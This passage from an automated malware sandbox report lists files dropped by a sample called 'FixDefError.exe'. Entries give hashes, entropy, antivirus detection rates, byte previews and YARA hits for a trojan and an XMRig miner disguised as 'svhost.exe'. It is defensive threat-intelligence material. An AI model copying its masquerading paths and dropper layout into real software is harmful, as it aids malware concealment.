                                                                                                                                                                                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: unknown
                                                                                                                                                                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\ProgramData\RuntimeBrokerData\svhost.exe, Author: unknown
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....ZLb...............&.._...~................@...................................F9....`... .................................................E...P........w..............`.............................. .u.(...................................................text....._......._.................`..`.data...`....._......._.............@....rdata.. I....`..J....`.............@..@.pdata........w.......w.............@..@.xdata.......z.......y.............@..@.bss....`.2...}..........................idata...E......F....}.............@....CRT....h....0........}.............@....tls.........@........}.............@....rsrc........P........}.............@....reloc.......`........~.............@..B........................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.001.etl (copy)

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):4096
                                                                                                                                                                                                                    Entropy (8bit):1.0712517987358952
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:EDrwXqy6q9995nynllTk56GWtbgjO3s7Sk56GYrH:ak68qllTGtm2SGtEH
                                                                                                                                                                                                                    MD5:6941A631A897376575E236889F046FBF
                                                                                                                                                                                                                    SHA1:265FB5BEB5E26513735F508677E726419B3862D4
                                                                                                                                                                                                                    SHA-256:7B78D45B96B7523F4829142025DC9E84A7FAF4323327E08FAC1B4F5767669F04
                                                                                                                                                                                                                    SHA-512:A476DF911ECEF1CFEEF022D1B379FBA974A71F46645E0F123B46384039E401F1800EA754174422E7F0A281DC45851DD2B3F4CFDD5BA339DD8E8C65AB2A6A5953
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:................................................................................X...X...c.A.2Z...................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....c.A.2Z..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.X...X...c.A.2Z..................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration_Temp.1.etl

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):4096
                                                                                                                                                                                                                    Entropy (8bit):1.0712517987358952
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:EDrwXqy6q9995nynllTk56GWtbgjO3s7Sk56GYrH:ak68qllTGtm2SGtEH
                                                                                                                                                                                                                    MD5:6941A631A897376575E236889F046FBF
                                                                                                                                                                                                                    SHA1:265FB5BEB5E26513735F508677E726419B3862D4
                                                                                                                                                                                                                    SHA-256:7B78D45B96B7523F4829142025DC9E84A7FAF4323327E08FAC1B4F5767669F04
                                                                                                                                                                                                                    SHA-512:A476DF911ECEF1CFEEF022D1B379FBA974A71F46645E0F123B46384039E401F1800EA754174422E7F0A281DC45851DD2B3F4CFDD5BA339DD8E8C65AB2A6A5953
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:................................................................................X...X...c.A.2Z...................B..............Zb..K....(..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....c.A.2Z..........U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n._.T.e.m.p...1...e.t.l.........P.P.X...X...c.A.2Z..................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FixDefError.exe.log

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1119
                                                                                                                                                                                                                    Entropy (8bit):5.356708753875314
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:ML9E4Ks29E4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKzd
                                                                                                                                                                                                                    MD5:12BC6A423CB11584DBBB3264AE68E0CE
                                                                                                                                                                                                                    SHA1:DE1E6954FF5E326226AD5469C3F1F0AC9E41C461
                                                                                                                                                                                                                    SHA-256:3592978914563991F47FFE8DDBBDC9CAAAD2B31F530335F17277192231015D6A
                                                                                                                                                                                                                    SHA-512:AF328D01DFD1B3733A0746A0C313A00FAF40CD02A5710BB40C17088C7F02D7E83B2C176C794ACD54BEEDDA2910D7DBDFB4DACC9282F19988D1271E2C805AB675
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ProgramStarter.exe.log

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):1211
                                                                                                                                                                                                                    Entropy (8bit):5.349329844867972
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzE
                                                                                                                                                                                                                    MD5:01E8E56005273B0ECADB5A7F9D85DC09
                                                                                                                                                                                                                    SHA1:B96A534655E4506577313F8B6DE0CB1A79AC0506
                                                                                                                                                                                                                    SHA-256:7BA9385539AD5F701511668619265113287F5292BBB2D50A3193C7565EB0CA96
                                                                                                                                                                                                                    SHA-512:A906F7CB6E346ADAE80116287725DF37C7E57AAF65DE82DC571907AFC86D5C36CC3EF317CB1ED82CD5C906F24BB3A8EDCABA8371D909EFF4A48CEC2FF23088D3
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):10434
                                                                                                                                                                                                                    Entropy (8bit):4.94012526707092
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:192:Xxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smcSydcU6Cazpo:6BVoGIpN6KQkj2Wkjh4iUxQedNYoGibY
                                                                                                                                                                                                                    MD5:8C18848AE92C662B40A42CFF5982C50A
                                                                                                                                                                                                                    SHA1:B1E5B9D40A279A48D883EB460BD7CD78CDC7416F
                                                                                                                                                                                                                    SHA-256:66799228E6C44EBFEBD6AFAF15DF5894A5BEB2B8CAE365C88BCA10DE5ACE0D90
                                                                                                                                                                                                                    SHA-512:1DC92D1940C9976CC991FED360BF18D2FD01B2237B1613869A9B0357EBAC51EA0DE7C0B3B3254F5A90CDA6EA99621501DFAB08D8FD81FF2E9792FBBEC8D0191E
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):22136
                                                                                                                                                                                                                    Entropy (8bit):5.574336755690247
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:utCRq0x3eVaaQUA0Rbr+RnY4xnRbBqRmQQoSLjc1naRLhWbcYg9DrdFIlrBWI+iv:53cQBoAY4xRdqRmQzOqa3C72kw7S
                                                                                                                                                                                                                    MD5:880CD6909D7CAF2777E03D0386CF4C24
                                                                                                                                                                                                                    SHA1:2DA8A0A8B806F833AA3AE7799AB17EC6D8C1A5DE
                                                                                                                                                                                                                    SHA-256:9EE8DDC3BB664EB372595DEB794F8730FE90FED1E5C6BEA6136BFA8C6A399F04
                                                                                                                                                                                                                    SHA-512:20B907778B45121F106059B8A0C587C7AEDB27FF2DF1E28EFFB28AED840DE4B01077827832A07DDFAA549426CB50206F360486A9DFF73974CC839294F7C8FD13
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:@...e...........W.........)...........,..............@..........H...............<@.^.L."My...:/..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.11008348563804743
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:26YLeTXm/Ey6q9995neNq3qQ10nMCldimE8eawHjc0HP:26TKl683LyMCldzE9BHjciP
                                                                                                                                                                                                                    MD5:69A1E51487EAE089A78B27364EA05DC8
                                                                                                                                                                                                                    SHA1:2AF103FB0AD1E6C928C23DD9D9E03263E95DDCB5
                                                                                                                                                                                                                    SHA-256:6BC5E78B78908B9A995E7E9558D5E24E0E0B4BEEA112E08378E2E72B539748BB
                                                                                                                                                                                                                    SHA-512:41FBF2BBB2E4774C34D6E68CC732246209C4A12F0885DF6AE1170C0DD5BE99E6A45CF06E4983F96C5E4A71278E418B1C96833250F3BD67240F352D744EF1438B
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....................................................................................4......d.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ........2Z..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....4.....d....................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.11255444863100625
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:wXjXm/Ey6q9995ncdg1miM3qQ10nMCldimE8eawHza1miIo6P:bl68mS1tMLyMCldzE9BHza1tID
                                                                                                                                                                                                                    MD5:E2A96493082A5B2A7C530DF69F5B50AB
                                                                                                                                                                                                                    SHA1:C567BCC50C8C07C1479176ED212B4DB86B742C8E
                                                                                                                                                                                                                    SHA-256:F2DD43F2FE995FAA2514861FE04B6176DE7D556FEF5CCF6C0E44B443599FCA1F
                                                                                                                                                                                                                    SHA-512:847C43303679F99E878D2A7C3E2B34EFC52EBD2C95FBE83A249E1976EFFE983C43D29153E493A6C81FCCA17F136D0BE1B9AB4117D05A7BB674A93B73167B5307
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....................................................................................4....,.c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... .....3h;.2Z..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....4....4.c....................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.11226972425315478
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:w1jXm/Ey6q9995nu71mK2P3qQ10nMCldimE8eawHza1mKEAP:Fl68c1iPLyMCldzE9BHza15
                                                                                                                                                                                                                    MD5:BFA1B44C4A3CBB0FEB152699F2DC21FB
                                                                                                                                                                                                                    SHA1:71BAF7F8B7783D12ADFEC56A9FA929D3C96EEF6F
                                                                                                                                                                                                                    SHA-256:B1A1A8CDA1F994C157D45AB1A53938267B9BFED4028E07B798CA7163F0F5016E
                                                                                                                                                                                                                    SHA-512:3FF1FFB4C15A895E7C7912AA4FD675A5E1CE9184BE7CE42E53D65405C30B39E134C789E94856CD73C13C45D849A072BB090FCD140D9E5D1E615A52EE1B1C8D07
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....................................................................................4......c.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ......i..2Z..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....4......c....................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ProgramStarter.exe

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\FixDefError.exe
                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):471552
                                                                                                                                                                                                                    Entropy (8bit):7.74633642850456
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12288:7Pu1GphsJNnK2PoiC7FMUxvuB150WBuYpIEnHVk6hGO/FNcJv9qPs2w85KmdMd:VsbKaoiYFjvuf504dVk6C
                                                                                                                                                                                                                    MD5:0326F45523014399DEA91452C957B5E0
                                                                                                                                                                                                                    SHA1:47A4B2F2C8AFDB5EFBAD429F2EA3485B3752EC45
                                                                                                                                                                                                                    SHA-256:1A3DB0001B52CB3F6E16C45FC2D4D70FC3706B421A9B2B5006172026C60D84D7
                                                                                                                                                                                                                    SHA-512:2AA4B7AF945A936B16405A125FEE48C998DD42B8423F7CD56B5B49E7D270786D23D359729FB7E7DD212369AAAAB98C3E444F05C902F1C1E15416F7828AD21B42
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 31%
                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.O..........."...0..&..........>E... ...`....@.. ....................................`..................................D..W....`...............................D............................................... ............... ..H............text...D%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............0..............@..B................ E......H........-..............T,..p...............................................f.L.,........D{.q5h...v.........#!...W..b3..T...-.....k\.L-uj.@...ro..P.q.K...~-e...Jh.kV-t..+F..S..E..6.a...r$z.O.K......R...@.aC..V...2...e4P.A..3..yL....OP#4m.l2M2..T....2..q.$..Q)..-3......+o...?L.........H.$%nNo.k.-.|....V._..O....lZE.oPz$"o..............U7....Y...x. .5O....#.,4...u(...>.i..w..~.]..........1..E:......i..d.r.L=.}.h....X.....W.......z..d..N.O-Pmh.......!6L?.!.X....

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nooqsj1v.gcj.ps1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxcm1fgp.u3u.psm1

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:U:U
                                                                                                                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:1

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\mib.bin

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (484), with CRLF line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):916
                                                                                                                                                                                                                    Entropy (8bit):6.006091656254043
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:iyHCgHveQdw0d7YLqwx3DpWiO0cBCcH5y8d+M5:iyiEz77YLqGEiaBJYM
                                                                                                                                                                                                                    MD5:D80CBDF7FBA88ECF7F28F4CD6304B315
                                                                                                                                                                                                                    SHA1:D5AC6E2C716E522E65194289D6A2E381C7E40D4F
                                                                                                                                                                                                                    SHA-256:F4CB8536FB87529314794A5E826930DF121436D04E52F2EEB868CBAFF6E4BE01
                                                                                                                                                                                                                    SHA-512:30A9015929C335A82E85BE067D6624BE68C7B288BF3C0D4A4A6190A1A62D1E3321AFA3943E0EF4B7BF2374374C327E785D806E2D919CA4905D778A6B1192B5CC
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:91Kuym2o0uO1/JlBTKuGYsxlDwJ2KhbLg7HsEo2BQs3wRIgYtyArhVGuksyXMLWdzr4Q+6X5BXNhuPoIAW6EEcKLi4dltHqfZkJ75+yYf8gnQpCiCV5v940icl4TuX6Tvg9kmbSMbhq6z5AUIVj25RFurUUq5bphUJVFS5KIoNB4QTSK1c1nDqg=..0WYkiYGW5Edi+bvRlMTlg+9tKzAf6jFXVuenq9wOhLZqcmOBpKkBojF/Dgg2JARga43C4vNTSf5p8b+RhJHOH7dvj21cEblamTWQP4PeTAo7zTUycNhOsy6ie6HLzP1yS7HYD2m+i7kVIzhOUeEgjnsjQiUpT2/DLOgRDkFEQJr1AmjCOsIwh1+QoPo0dj93eog9eKccnPkwNCSgTuqo7emoyvIeKyO8mJkhCPpjpAlxMlIyU6NENUqTyeKlUb1IOElYGYfcNZxMKDDoQ0Lx7Ft1A0u6QqkQCVin0QkaUsFxvb7DEDcyFPsXQaUB4KCAKBsrBcVAsXSjOew7YJh1LavFo9vAzebVDGwWyCKVMRcym0AmZFznpN84upYfOxnFVQYldwSf1OCxr+NWnmz032Ht98zrhDMBubZHTARjjP5LSZLiVk7M5f/kltzQaHYhzbzbGUhJZlZ7SzGriJiGi/rgnUQdeKGOHQ==..KyDTvW5GhLdanpKLz21nhq5NL+Rc0RCZwkL4YQ8lbbvGt3Y0EesDT13+bgpfkEEC+fod0jDQUy/oMfMFwROck7ZLTHjPFCisZC7PtCbO0GaZw4M67/eC2YJkmwbGuJReab1bOE/Wmhpy55AcAAKwf+gc3i5Q4x5abIp+ioFlrd7SrFrC1lwXaNlJHRISaGykUPsppIXd+zRpyCUHpseK/GxMk322Y9a2Ug==..1..171010202..

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001 (copy)

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.11008348563804743
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:12:26YLeTXm/Ey6q9995neNq3qQ10nMCldimE8eawHjc0HP:26TKl683LyMCldzE9BHjciP
                                                                                                                                                                                                                    MD5:69A1E51487EAE089A78B27364EA05DC8
                                                                                                                                                                                                                    SHA1:2AF103FB0AD1E6C928C23DD9D9E03263E95DDCB5
                                                                                                                                                                                                                    SHA-256:6BC5E78B78908B9A995E7E9558D5E24E0E0B4BEEA112E08378E2E72B539748BB
                                                                                                                                                                                                                    SHA-512:41FBF2BBB2E4774C34D6E68CC732246209C4A12F0885DF6AE1170C0DD5BE99E6A45CF06E4983F96C5E4A71278E418B1C96833250F3BD67240F352D744EF1438B
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:....................................................................................4......d.....................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................ee....... ........2Z..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....4.....d....................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                    C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)

                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                                    Entropy (8bit):0.11255444863100625
                                                                                                                                                                                                                    Encrypted:false
